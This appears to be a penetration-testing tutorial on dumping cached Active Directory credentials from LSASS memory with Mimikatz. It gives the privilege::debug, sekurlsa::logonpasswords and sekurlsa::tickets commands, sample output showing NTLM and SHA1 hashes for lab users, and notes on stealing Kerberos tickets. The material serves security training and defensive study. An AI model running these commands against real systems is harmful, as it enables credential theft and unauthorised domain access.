Cached AD Credentials
In modern versions of Windows, Kerberos hashes are stored in the Local Security Authority Subsystem Service (LSASS) memory space.
If we gain access to these hashes, we could crack them to obtain the cleartext password or reuse them to perform various actions. Although this is the end goal of our AD attack, the process is not straightforward.
The LSASS process is part of the operating system and runs as SYSTEM, we need SYSTEM (or local administrator) permissions to gain access to the hashes stored on a target.
Because of this, we often have to start our attack with a local privilege escalation in order to retrieve the stored hashes, and the data structures used to store hashes in memory are not publicly documented, and they are also encrypted with an LSASS-stored key.
Since the extraction of cached credentials is a large attack vector against Windows and Active Directory, several tools have been created to extract the hashes. The most popular of these tools is Mimikatz.
Dumping LSASS Password Hashes
Start mimikatz and enter privilege::debug to engage the SeDebugPrivilege privilege, which allows us to interact with a process owned by another user:
PS C:\Windows\system32> cd C:\Tools
PS C:\Tools\> .\mimikatz.exe
...
mimikatz # privilege::debug
Privilege '20' OKNext run sekurlsa::logonpasswords to dump the credentionals of all logged-on users with the Sekurlsa module.
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 4876838 (00000000:004a6a26)
Session : RemoteInteractive from 2
User Name : jeff
Domain : CORP
Logon Server : DC1
Logon Time : 9/9/2022 12:32:11 PM
SID : S-1-5-21-1987370270-658905905-1781884369-1105
msv :
[00000003] Primary
* Username : jeff
* Domain : CORP
* NTLM : 2688c6d2af5e9c7ddb268899123744ea
* SHA1 : f57d987a25f39a2887d158e8d5ac41bc8971352f
* DPAPI : 3a847021d5488a148c265e6d27a420e6
tspkg :
wdigest :
* Username : jeff
* Domain : CORP
* Password : (null)
kerberos :
* Username : jeff
* Domain : CORP.COM
* Password : (null)
ssp :
credman :
cloudap :
...
Authentication Id : 0 ; 122474 (00000000:0001de6a)
Session : Service from 0
User Name : dave
Domain : CORP
Logon Server : DC1
Logon Time : 9/9/2022 1:32:23 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1103
msv :
[00000003] Primary
* Username : dave
* Domain : CORP
* NTLM : 08d7a47a6f9f66b97b1bae4178747494
* SHA1 : a0c2285bfad20cc614e2d361d6246579843557cd
* DPAPI : fed8536adc54ad3d6d9076cbc6dd171d
tspkg :
wdigest :
* Username : dave
* Domain : CORP
* Password : (null)
kerberos :
* Username : dave
* Domain : CORP.COM
* Password : (null)
ssp :
credman :
cloudap :
...Exploiting Kerberos TGT and Service Tickets
A different approach from dumping NTLM hashes and trying to crack them would be to use Mimikatz to exploit Kerberos authentication by using TGT and service tickets. Kerberos TGT and service tickets for users currently logged on to the local machine are stored for future use. These tickets are also stored in LSASS, and we can use Mimikatz to interact with and retrieve our own tickets as well as the tickets of other local users.
Cache a Service Ticket
Once the directory listing has been executed on the SMB share, we can use Mimikatz to show the tickets that are stored in memory by using sekurlsa::tickets
The output contains both a TGT and a TGS. Stealing the TGS would allow us to access only particular resources associated with those tickets. Alternatively, armed with a TGT, we could request a TGS for specific resources we want to target within the domain.
Mimikatz can also export tickets to the hard drive and import tickets into LSASS.
Last updated